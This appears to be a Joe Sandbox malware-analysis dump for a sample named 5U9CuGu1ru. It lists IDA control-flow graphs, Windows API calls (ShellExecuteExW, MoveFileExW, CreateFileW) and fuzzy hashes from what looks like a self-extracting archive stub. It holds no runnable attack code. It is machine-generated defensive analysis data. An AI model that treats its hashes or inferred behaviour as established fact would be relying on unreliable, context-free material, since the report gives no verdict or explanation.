              control_flow_graph 406 81bdf5-81be0d call 81e28c call 81e360 411 81ca90-81ca9d 406->411 412 81be13-81be3d call 81aa36 406->412 412->411 415 81be43-81be48 412->415 416 81be49-81be57 415->416 417 81be58-81be6d call 81a6c7 416->417 420 81be6f 417->420 421 81be71-81be86 call 8117ac 420->421 424 81be93-81be96 421->424 425 81be88-81be8c 421->425 427 81ca5c-81ca87 call 81aa36 424->427 428 81be9c 424->428 425->421 426 81be8e 425->426 426->427 427->416 440 81ca8d-81ca8f 427->440 430 81bea3-81bea6 428->430 431 81c132-81c134 428->431 432 81c115-81c117 428->432 433 81c074-81c076 428->433 430->427 438 81beac-81bf06 call 819da4 call 80b965 call 80a49d call 80a5d7 call 8070bf 430->438 431->427 435 81c13a-81c141 431->435 432->427 434 81c11d-81c12d SetWindowTextW 432->434 433->427 437 81c07c-81c088 433->437 434->427 435->427 439 81c147-81c160 435->439 441 81c08a-81c09b call 827168 437->441 442 81c09c-81c0a1 437->442 494 81c045-81c05a call 80a52a 438->494 444 81c162 439->444 445 81c168-81c176 call 8235b3 439->445 440->411 441->442 448 81c0a3-81c0a9 442->448 449 81c0ab-81c0b6 call 81ab9a 442->449 444->445 445->427 462 81c17c-81c185 445->462 454 81c0bb-81c0bd 448->454 449->454 456 81c0c8-81c0e8 call 8235b3 call 8235de 454->456 457 81c0bf-81c0c6 call 8235b3 454->457 483 81c101-81c103 456->483 484 81c0ea-81c0f1 456->484 457->456 467 81c187-81c18b 462->467 468 81c1ae-81c1b1 462->468 467->468 473 81c18d-81c195 467->473 470 81c1b7-81c1ba 468->470 471 81c296-81c2a4 call 80fe56 468->471 476 81c1c7-81c1e2 470->476 477 81c1bc-81c1c1 470->477 485 81c2a6-81c2ba call 8217cb 471->485 473->427 474 81c19b-81c1a9 call 80fe56 473->474 474->485 495 81c1e4-81c21e 476->495 496 81c22c-81c233 476->496 477->471 477->476 483->427 486 81c109-81c110 call 8235ce 483->486 490 81c0f3-81c0f5 484->490 491 81c0f8-81c100 call 827168 484->491 505 81c2c7-81c318 call 80fe56 call 81a8d0 GetDlgItem SetWindowTextW SendMessageW call 8235e9 485->505 506 81c2bc-81c2c0 485->506 486->427 490->491 491->483 512 81c060-81c06f call 80a4b3 494->512 513 81bf0b-81bf1f SetFileAttributesW 494->513 529 81c220 495->529 530 81c222-81c224 495->530 498 81c261-81c284 call 8235b3 * 2 496->498 499 81c235-81c24d call 8235b3 496->499 498->485 534 81c286-81c294 call 80fe2e 498->534 499->498 516 81c24f-81c25c call 80fe2e 499->516 540 81c31d-81c321 505->540 506->505 511 81c2c2-81c2c4 506->511 511->505 512->427 518 81bfc5-81bfd5 GetFileAttributesW 513->518 519 81bf25-81bf58 call 80b4f7 call 80b207 call 8235b3 513->519 516->498 518->494 527 81bfd7-81bfe6 DeleteFileW 518->527 550 81bf6b-81bf79 call 80b925 519->550 551 81bf5a-81bf69 call 8235b3 519->551 527->494 533 81bfe8-81bfeb 527->533 529->530 530->496 537 81bfef-81c01b call 80400a GetFileAttributesW 533->537 534->485 546 81bfed-81bfee 537->546 547 81c01d-81c033 MoveFileW 537->547 540->427 544 81c327-81c33b SendMessageW 540->544 544->427 546->537 547->494 549 81c035-81c03f MoveFileExW 547->549 549->494 550->512 556 81bf7f-81bfbe call 8235b3 call 81f350 550->556 551->550 551->556 556->518
              APIs
              • __EH_prolog.LIBCMT ref: 0081BDFA
                • Part of subcall function 0081AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0081AAFE
              • SetWindowTextW.USER32(?,?), ref: 0081C127
              • _wcsrchr.LIBVCRUNTIME ref: 0081C2B1
              • GetDlgItem.USER32(?,00000066), ref: 0081C2EC
              • SetWindowTextW.USER32(00000000,?), ref: 0081C2FC
              • SendMessageW.USER32(00000000,00000143,00000000,0084A472), ref: 0081C30A
              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0081C335
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
              • API String ID: 3564274579-312220925
              • Opcode ID: cfe64a1a46c06e36ddd7bdd2f4f38f3e79049aa11aeebc28dc0e963fe37def7e
              • Instruction ID: 4bc8e5a100f55c260ce35f322a63a2fa255a7cbe187ab7d752f433dbcce75385
              • Opcode Fuzzy Hash: cfe64a1a46c06e36ddd7bdd2f4f38f3e79049aa11aeebc28dc0e963fe37def7e
              • Instruction Fuzzy Hash: 90E17FB2D44628AADB25DBA4DC45DEF777CFF08311F0041A6FA09E3191EB749AC48B51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 561 80d341-80d378 call 81e28c call 81e360 call 8215e8 568 80d37a-80d3a9 GetModuleFileNameW call 80bc85 call 80fe2e 561->568 569 80d3ab-80d3b4 call 80fe56 561->569 573 80d3b9-80d3dd call 809619 call 8099b0 568->573 569->573 580 80d7a0-80d7a6 call 809653 573->580 581 80d3e3-80d3eb 573->581 585 80d7ab-80d7bb 580->585 583 80d409-80d438 call 825a90 * 2 581->583 584 80d3ed-80d405 call 813781 * 2 581->584 594 80d43b-80d43e 583->594 595 80d407 584->595 596 80d444-80d44a call 809e40 594->596 597 80d56c-80d58f call 809d30 call 8235d3 594->597 595->583 601 80d44f-80d476 call 809bf0 596->601 597->580 606 80d595-80d5b0 call 809bf0 597->606 607 80d535-80d538 601->607 608 80d47c-80d484 601->608 620 80d5b2-80d5b7 606->620 621 80d5b9-80d5cc call 8235d3 606->621 612 80d53b-80d55d call 809d30 607->612 610 80d486-80d48e 608->610 611 80d4af-80d4ba 608->611 610->611 614 80d490-80d4aa call 825ec0 610->614 615 80d4e5-80d4ed 611->615 616 80d4bc-80d4c8 611->616 612->594 631 80d563-80d566 612->631 637 80d52b-80d533 614->637 638 80d4ac 614->638 618 80d519-80d51d 615->618 619 80d4ef-80d4f7 615->619 616->615 623 80d4ca-80d4cf 616->623 618->607 626 80d51f-80d522 618->626 619->618 625 80d4f9-80d513 call 825ec0 619->625 627 80d5f1-80d5f8 620->627 621->580 642 80d5d2-80d5ee call 81137a call 8235ce 621->642 623->615 630 80d4d1-80d4e3 call 825808 623->630 625->580 625->618 626->608 633 80d5fa 627->633 634 80d5fc-80d625 call 80fdfb call 8235d3 627->634 630->615 643 80d527 630->643 631->580 631->597 633->634 651 80d633-80d649 634->651 652 80d627-80d62e call 8235ce 634->652 637->612 638->611 642->627 643->637 654 80d731-80d757 call 80ce72 call 8235ce * 2 651->654 655 80d64f-80d65d 651->655 652->580 691 80d771-80d79d call 825a90 * 2 654->691 692 80d759-80d76f call 813781 * 2 654->692 658 80d664-80d669 655->658 660 80d97c-80d984 658->660 661 80d66f-80d678 658->661 662 80d98a-80d98e 660->662 663 80d72b-80d72e 660->663 665 80d684-80d68b 661->665 666 80d67a-80d67e 661->666 669 80d990-80d996 662->669 670 80d9de-80d9e4 662->670 663->654 667 80d880-80d891 call 80fcbf 665->667 668 80d691-80d6b6 665->668 666->660 666->665 693 80d976-80d979 667->693 694 80d897-80d8c0 call 80fe56 call 825885 667->694 674 80d6b9-80d6de call 8235b3 call 825808 668->674 675 80d722-80d725 669->675 676 80d99c-80d9a3 669->676 672 80d9e6-80d9ec 670->672 673 80da0a-80da2a call 80ce72 670->673 672->673 679 80d9ee-80d9f4 672->679 696 80da02-80da05 673->696 710 80d6e0-80d6ea 674->710 711 80d6f6 674->711 675->658 675->663 682 80d9a5-80d9a8 676->682 683 80d9ca 676->683 679->675 686 80d9fa-80da01 679->686 689 80d9c6-80d9c8 682->689 690 80d9aa-80d9ad 682->690 695 80d9cc-80d9d9 683->695 686->696 689->695 698 80d9c2-80d9c4 690->698 699 80d9af-80d9b2 690->699 691->580 692->691 693->660 694->693 720 80d8c6-80d93c call 811596 call 80fdfb call 80fdd4 call 80fdfb call 8258d9 694->720 695->675 698->695 704 80d9b4-80d9b8 699->704 705 80d9be-80d9c0 699->705 704->679 712 80d9ba-80d9bc 704->712 705->695 710->711 716 80d6ec-80d6f4 710->716 717 80d6f9-80d6fd 711->717 712->695 716->717 717->674 721 80d6ff-80d706 717->721 754 80d94a-80d95f 720->754 755 80d93e-80d947 720->755 723 80d70c-80d71a call 80fdfb 721->723 724 80d7be-80d7c1 721->724 731 80d71f 723->731 724->667 726 80d7c7-80d7ce 724->726 729 80d7d0-80d7d4 726->729 730 80d7d6-80d7d7 726->730 729->730 733 80d7d9-80d7e7 729->733 730->726 731->675 735 80d808-80d830 call 811596 733->735 736 80d7e9-80d7ec 733->736 743 80d832-80d84e call 8235e9 735->743 744 80d853-80d85b 735->744 738 80d805 736->738 739 80d7ee-80d803 736->739 738->735 739->736 739->738 743->731 747 80d862-80d87b call 80dd6b 744->747 748 80d85d 744->748 747->731 748->747 756 80d960-80d967 754->756 755->754 757 80d973-80d974 756->757 758 80d969-80d96d 756->758 757->756 758->731 758->757
              APIs
              • __EH_prolog.LIBCMT ref: 0080D346
              • _wcschr.LIBVCRUNTIME ref: 0080D367
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0080D328,?), ref: 0080D382
              • __fprintf_l.LIBCMT ref: 0080D873
                • Part of subcall function 0081137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0080B652,00000000,?,?,?,00010450), ref: 00811396
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
              • API String ID: 4184910265-980926923
              • Opcode ID: ae2ec19b9f21cacf91fe2c6661dfb7cc4a244bd5fcfa1f258b0f3509ba470c21
              • Instruction ID: 73be4bec107a921c2d000b0ae009e5d8c2ee984b6628247c7155c58c33f80efb
              • Opcode Fuzzy Hash: ae2ec19b9f21cacf91fe2c6661dfb7cc4a244bd5fcfa1f258b0f3509ba470c21
              • Instruction Fuzzy Hash: AD12C071A003199ADB64DFE8DC82BEEB7B5FF44304F104569E605E72C2EB709A84CB65

              Control-flow Graph

              APIs
                • Part of subcall function 0081AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0081AC85
                • Part of subcall function 0081AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0081AC96
                • Part of subcall function 0081AC74: IsDialogMessageW.USER32(00010450,?), ref: 0081ACAA
                • Part of subcall function 0081AC74: TranslateMessage.USER32(?), ref: 0081ACB8
                • Part of subcall function 0081AC74: DispatchMessageW.USER32(?), ref: 0081ACC2
              • GetDlgItem.USER32(00000068,0085ECB0), ref: 0081CB6E
              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0081A632,00000001,?,?,0081AECB,00834F88,0085ECB0), ref: 0081CB96
              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0081CBA1
              • SendMessageW.USER32(00000000,000000C2,00000000,008335B4), ref: 0081CBAF
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0081CBC5
              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0081CBDF
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0081CC23
              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0081CC31
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0081CC40
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0081CC67
              • SendMessageW.USER32(00000000,000000C2,00000000,0083431C), ref: 0081CC76
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
              • String ID: \
              • API String ID: 3569833718-2967466578
              • Opcode ID: c3cace8c4ebf533987495cfb6e7ffef3860f2c67fc3229b598ba2261d5fbe27a
              • Instruction ID: 9f0790fa27c73bb096066853c1e219562091c55bb906a6fe0d1544c6948ecf08
              • Opcode Fuzzy Hash: c3cace8c4ebf533987495cfb6e7ffef3860f2c67fc3229b598ba2261d5fbe27a
              • Instruction Fuzzy Hash: 6731AB71185B52ABE301DF209C4AFAB7EACFB82714F010518FA51D62D1DBA45908CBBB

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 795 81ce22-81ce3a call 81e360 798 81ce40-81ce4c call 8235b3 795->798 799 81d08b-81d093 795->799 798->799 802 81ce52-81ce7a call 81f350 798->802 805 81ce84-81ce91 802->805 806 81ce7c 802->806 807 81ce93 805->807 808 81ce95-81ce9e 805->808 806->805 807->808 809 81cea0-81cea2 808->809 810 81ced6 808->810 811 81ceaa-81cead 809->811 812 81ceda-81cedd 810->812 813 81ceb3-81cebb 811->813 814 81d03c-81d041 811->814 815 81cee4-81cee6 812->815 816 81cedf-81cee2 812->816 817 81cec1-81cec7 813->817 818 81d055-81d05d 813->818 819 81d043 814->819 820 81d036-81d03a 814->820 821 81cef9-81cf0e call 80b493 815->821 822 81cee8-81ceef 815->822 816->815 816->821 817->818 823 81cecd-81ced4 817->823 825 81d065-81d06d 818->825 826 81d05f-81d061 818->826 824 81d048-81d04c 819->824 820->814 820->824 830 81cf10-81cf1d call 8117ac 821->830 831 81cf27-81cf32 call 80a180 821->831 822->821 827 81cef1 822->827 823->810 823->811 824->818 825->812 826->825 827->821 830->831 836 81cf1f 830->836 837 81cf34-81cf4b call 80b239 831->837 838 81cf4f-81cf5c ShellExecuteExW 831->838 836->831 837->838 840 81cf62-81cf6f 838->840 841 81d08a 838->841 843 81cf71-81cf78 840->843 844 81cf82-81cf84 840->844 841->799 843->844 845 81cf7a-81cf80 843->845 846 81cf86-81cf8f 844->846 847 81cf9b-81cfba call 81d2e6 844->847 845->844 848 81cff1-81cffd CloseHandle 845->848 846->847 853 81cf91-81cf99 ShowWindow 846->853 847->848 865 81cfbc-81cfc4 847->865 851 81cfff-81d00c call 8117ac 848->851 852 81d00e-81d01c 848->852 851->852 863 81d072 851->863 854 81d079-81d07b 852->854 855 81d01e-81d020 852->855 853->847 854->841 860 81d07d-81d07f 854->860 855->854 858 81d022-81d028 855->858 858->854 864 81d02a-81d034 858->864 860->841 862 81d081-81d084 ShowWindow 860->862 862->841 863->854 864->854 865->848 866 81cfc6-81cfd7 GetExitCodeProcess 865->866 866->848 867 81cfd9-81cfe3 866->867 868 81cfe5 867->868 869 81cfea 867->869 868->869 869->848
              APIs
              • ShellExecuteExW.SHELL32(?), ref: 0081CF54
              • ShowWindow.USER32(?,00000000), ref: 0081CF93
              • GetExitCodeProcess.KERNEL32(?,?), ref: 0081CFCF
              • CloseHandle.KERNEL32(?), ref: 0081CFF5
              • ShowWindow.USER32(?,00000001), ref: 0081D084
                • Part of subcall function 008117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0080BB05,00000000,.exe,?,?,00000800,?,?,008185DF,?), ref: 008117C2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
              • String ID: $.exe$.inf
              • API String ID: 3686203788-2452507128
              • Opcode ID: 9c816db67a28f93dc96e43e64f0d1b6133cf5da678687ede5c9475e267a5668e
              • Instruction ID: 0fb173ea2273ed80f06a09a89ed56c34901487c1e72459e89968d9a54039528d
              • Opcode Fuzzy Hash: 9c816db67a28f93dc96e43e64f0d1b6133cf5da678687ede5c9475e267a5668e
              • Instruction Fuzzy Hash: 8261DE70448B80AADB319F24D804AEBBBEEFF85304F044819F5C5D7251DBB599CACB92

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 870 82a058-82a071 871 82a073-82a083 call 82e6ed 870->871 872 82a087-82a08c 870->872 871->872 879 82a085 871->879 873 82a099-82a0bd MultiByteToWideChar 872->873 874 82a08e-82a096 872->874 877 82a0c3-82a0cf 873->877 878 82a250-82a263 call 81ec4a 873->878 874->873 880 82a123 877->880 881 82a0d1-82a0e2 877->881 879->872 883 82a125-82a127 880->883 884 82a101-82a112 call 828518 881->884 885 82a0e4-82a0f3 call 831a30 881->885 887 82a245 883->887 888 82a12d-82a140 MultiByteToWideChar 883->888 884->887 898 82a118 884->898 885->887 897 82a0f9-82a0ff 885->897 892 82a247-82a24e call 82a2c0 887->892 888->887 891 82a146-82a158 call 82a72c 888->891 899 82a15d-82a161 891->899 892->878 901 82a11e-82a121 897->901 898->901 899->887 902 82a167-82a16e 899->902 901->883 903 82a170-82a175 902->903 904 82a1a8-82a1b4 902->904 903->892 905 82a17b-82a17d 903->905 906 82a200 904->906 907 82a1b6-82a1c7 904->907 905->887 908 82a183-82a19d call 82a72c 905->908 909 82a202-82a204 906->909 910 82a1e2-82a1f3 call 828518 907->910 911 82a1c9-82a1d8 call 831a30 907->911 908->892 925 82a1a3 908->925 915 82a206-82a21f call 82a72c 909->915 916 82a23e-82a244 call 82a2c0 909->916 910->916 924 82a1f5 910->924 911->916 922 82a1da-82a1e0 911->922 915->916 928 82a221-82a228 915->928 916->887 927 82a1fb-82a1fe 922->927 924->927 925->887 927->909 929 82a264-82a26a 928->929 930 82a22a-82a22b 928->930 931 82a22c-82a23c WideCharToMultiByte 929->931 930->931 931->916 932 82a26c-82a273 call 82a2c0 931->932 932->892
              APIs
              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00824E35,00824E35,?,?,?,0082A2A9,00000001,00000001,3FE85006), ref: 0082A0B2
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0082A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0082A138
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0082A232
              • __freea.LIBCMT ref: 0082A23F
                • Part of subcall function 00828518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0082C13D,00000000,?,008267E2,?,00000008,?,008289AD,?,?,?), ref: 0082854A
              • __freea.LIBCMT ref: 0082A248
              • __freea.LIBCMT ref: 0082A26D
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ByteCharMultiWide__freea$AllocateHeap
              • String ID:
              • API String ID: 1414292761-0
              • Opcode ID: 5d5e507fe6f65517d8e8d78d77bd3aec429310dd2df805ee120eb2c6ea989dab
              • Instruction ID: e62e1ba48353a8d6ee877cbd4a47ccab26d905bac5f95a32d51ec69b9cf7fcde
              • Opcode Fuzzy Hash: 5d5e507fe6f65517d8e8d78d77bd3aec429310dd2df805ee120eb2c6ea989dab
              • Instruction Fuzzy Hash: 5C519F72610226EFDB298E64EC41EBB77AAFF44B60F154629FC05D6140EB35DCD0C6A2

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 935 81a2c7-81a2e6 GetClassNameW 936 81a2e8-81a2fd call 8117ac 935->936 937 81a30e-81a310 935->937 942 81a30d 936->942 943 81a2ff-81a30b FindWindowExW 936->943 938 81a312-81a314 937->938 939 81a31b-81a31f 937->939 938->939 942->937 943->942
              APIs
              • GetClassNameW.USER32(?,?,00000050), ref: 0081A2DE
              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0081A315
                • Part of subcall function 008117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0080BB05,00000000,.exe,?,?,00000800,?,?,008185DF,?), ref: 008117C2
              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0081A305
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AutoClassCompareCompleteFindNameStringWindow
              • String ID: @Ut$EDIT
              • API String ID: 4243998846-2065656831
              • Opcode ID: 35a1eef244258d5d6db76eafb72fc5994946d3272d285e48a885d1a3c1fd9d05
              • Instruction ID: 5bea2574cf766ec3f69683159706d8b0b0f2a4e8926db9f80cde7fabadc11a01
              • Opcode Fuzzy Hash: 35a1eef244258d5d6db76eafb72fc5994946d3272d285e48a885d1a3c1fd9d05
              • Instruction Fuzzy Hash: 83F08232A02A2877E7205A64AD09FDB776CFF46B50F051096FE45E2280D7A0A985C6F7

              Control-flow Graph

              APIs
                • Part of subcall function 00810085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008100A0
                • Part of subcall function 00810085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0080EB86,Crypt32.dll,00000000,0080EC0A,?,?,0080EBEC,?,?,?), ref: 008100C2
              • OleInitialize.OLE32(00000000), ref: 0081A34E
              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0081A385
              • SHGetMalloc.SHELL32(00848430), ref: 0081A38F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
              • String ID: riched20.dll$3Qo
              • API String ID: 3498096277-4232643773
              • Opcode ID: e09e28dcc7e4edca2cf4d384c0a37e0d060f71f4ed69fa6fc79926a33f81f06c
              • Instruction ID: 45c8ac093c374d70a9812070a9c604febf93c50d57e1decb31a352872c99eabf
              • Opcode Fuzzy Hash: e09e28dcc7e4edca2cf4d384c0a37e0d060f71f4ed69fa6fc79926a33f81f06c
              • Instruction Fuzzy Hash: CCF0ECB1D00609ABDB10AF9998499EFFBFCFF95701F00415AE914E2240DBB856458BA1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 948 8099b0-8099d1 call 81e360 951 8099d3-8099d6 948->951 952 8099dc 948->952 951->952 953 8099d8-8099da 951->953 954 8099de-8099fb 952->954 953->954 955 809a03-809a0d 954->955 956 8099fd 954->956 957 809a12-809a31 call 8070bf 955->957 958 809a0f 955->958 956->955 961 809a33 957->961 962 809a39-809a57 CreateFileW 957->962 958->957 961->962 963 809a59-809a7b GetLastError call 80b66c 962->963 964 809abb-809ac0 962->964 973 809aaa-809aaf 963->973 974 809a7d-809a9f CreateFileW GetLastError 963->974 966 809ae1-809af5 964->966 967 809ac2-809ac5 964->967 968 809b13-809b1e 966->968 969 809af7-809b0f call 80fe56 966->969 967->966 971 809ac7-809adb SetFileTime 967->971 969->968 971->966 973->964 978 809ab1 973->978 976 809aa1 974->976 977 809aa5-809aa8 974->977 976->977 977->964 977->973 978->964
              APIs
              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,008078AD,?,00000005,?,00000011), ref: 00809A4C
              • GetLastError.KERNEL32(?,?,008078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00809A59
              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,008078AD,?,00000005,?), ref: 00809A8E
              • GetLastError.KERNEL32(?,?,008078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00809A96
              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,008078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00809ADB
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: File$CreateErrorLast$Time
              • String ID:
